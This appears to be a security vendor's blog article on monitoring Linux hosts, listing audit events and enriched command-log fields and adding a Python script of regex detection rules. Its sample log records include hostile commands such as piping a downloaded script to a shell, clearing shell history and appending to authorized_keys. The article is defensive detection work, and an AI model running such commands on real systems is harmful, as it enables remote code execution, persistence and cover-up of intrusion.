Advanced Linux threats Monitoring


In this article, we discuss the standard monitoring capabilities of Unix/Linux and present CyberSIEM’s own developments that extend and upgrade Linux monitoring. These capabilities are deployed in the monitored environments of our customers.

TrendMicro’s article “A Look at Linux” discusses how Linux has become an attractive target for attackers and how it is exposed to a variety of threats and risks. The authors discuss a few main risks and threats, including vulnerabilities, misconfigurations and security gaps, and malware.


The total number of publicly exposed FTP servers according to a Shodan search performed on January 5, 2021

As the demand for visibility into organizational systems grows, one of the most significant blind spots is activity on Linux/Unix hosts and the ability to track it.

A large portion of the core components and critical systems in an organization run a Linux operating system, for example:

  • Network components: switches, routers, firewalls, IPS, WAF
  • Virtualization: VMware, ESX, Docker

At CyberSIEM, we have taken the essential data at all levels and developed unique new monitoring capabilities (Linux CLI).

OS Audit:

  • Change passwords of existing accounts
  • Unlock or un-expire locked or expired accounts
  • Create new accounts
  • Delete accounts
  • Delete log files
  • Change log files
  • Delete or change system configuration files
  • USB drive connections
  • Mount activities


Linux CLI:

We have developed a unique capability that collects every command a user runs on the operating system and delivers it to the SIEM as a log record enriched with additional context. This gives our customers a much more robust defense capability on top of OS Audit:

Each log record carries the following fields:

  1. Time
  2. Server name
  3. Username
  4. Command
  5. Execution path
  6. Operating system type
  7. SSH session
  8. SSH source address
  9. SSH source hostname
  10. Source port
  11. Destination port


A few additional examples of monitoring capabilities developed by CyberSIEM’s team and used by our customers:

  1. Handling of the ‘aliases’ file.
  2. Handling of the ‘passwd’ file.
  3. Handling of the SSH ‘authorized_keys’ file.
  4. Command history was deleted.
  5. The user started a simple HTTP server using Python.
  6. The user downloaded an executable file from the Internet and ran it.
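As an added illustration of how such rules can be applied to the enriched command log described above (this is not CyberSIEM’s code; the field names, rule patterns and sample records are assumptions constructed for the example), the following script matches the listed use cases against command records and emits alerts carrying the enrichment fields:

```python
import re

# Constructed sample records mirroring the eleven fields listed above; the
# field names and the values themselves are assumptions made for this example.
FIELDS = ("time", "server", "user", "cmd", "cwd", "os", "ssh_session",
          "src_ip", "src_host", "src_port", "dst_port")
ROWS = [
    ("2021-01-05T10:00:01Z", "web01", "alice", "ls -la /var/log", "/home/alice", "linux", "7", "10.0.0.5", "ws05", 51022, 22),
    ("2021-01-05T10:02:13Z", "web01", "alice", "cat key.pub >> ~/.ssh/authorized_keys", "/home/alice", "linux", "7", "10.0.0.5", "ws05", 51022, 22),
    ("2021-01-05T10:03:40Z", "db02", "bob", "python3 -m http.server 8080", "/tmp", "linux", "9", "10.0.0.9", "ws09", 50110, 22),
    ("2021-01-05T10:04:02Z", "db02", "bob", "history -c && rm -f ~/.bash_history", "/tmp", "linux", "9", "10.0.0.9", "ws09", 50110, 22),
    ("2021-01-05T10:05:30Z", "db02", "bob", "curl -s http://example.invalid/setup.sh | sh", "/tmp", "linux", "9", "10.0.0.9", "ws09", 50110, 22),
]
SAMPLE_LOGS = [dict(zip(FIELDS, row)) for row in ROWS]

# One pattern per use case in the list above. Rule names are ours; tune the
# patterns to the shells and tools actually present in your environment.
RULES = {
    "aliases_file": re.compile(r"/etc/aliases\b|\bnewaliases\b"),
    "passwd_file": re.compile(r"/etc/(passwd|shadow)\b"),
    "authorized_keys": re.compile(r"authorized_keys\b"),
    "history_cleared": re.compile(r"\bhistory\s+-c\b|bash_history\b|\bHISTFILE\b"),
    "python_http_server": re.compile(r"\bpython\S*\s+-m\s+(http\.server|SimpleHTTPServer)\b"),
    "download_and_run": re.compile(r"\b(curl|wget)\b.*(\|\s*(ba|z)?sh\b|&&\s*chmod\s+\+x)"),
}


def match_rules(record):
    """Names of the rules whose pattern appears in the logged command."""
    return [name for name, rx in RULES.items() if rx.search(record["cmd"])]


def alerts(records):
    """One alert per (record, rule), carrying the enrichment an analyst needs
    to pivot: who ran it, on which server, and from which SSH source."""
    out = []
    for rec in records:
        for rule in match_rules(rec):
            out.append({"rule": rule, "time": rec["time"], "server": rec["server"],
                        "user": rec["user"], "session": rec["ssh_session"],
                        "src": f"{rec['src_host']} ({rec['src_ip']})", "cmd": rec["cmd"]})
    return out


if __name__ == "__main__":
    for alert in alerts(SAMPLE_LOGS):
        print(alert)
```

The benign `ls` record produces no alert, while each of the other four records maps to exactly one of the use cases, with the SSH source and session attached so the analyst can pivot to the originating host.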

Kfir Ozeri
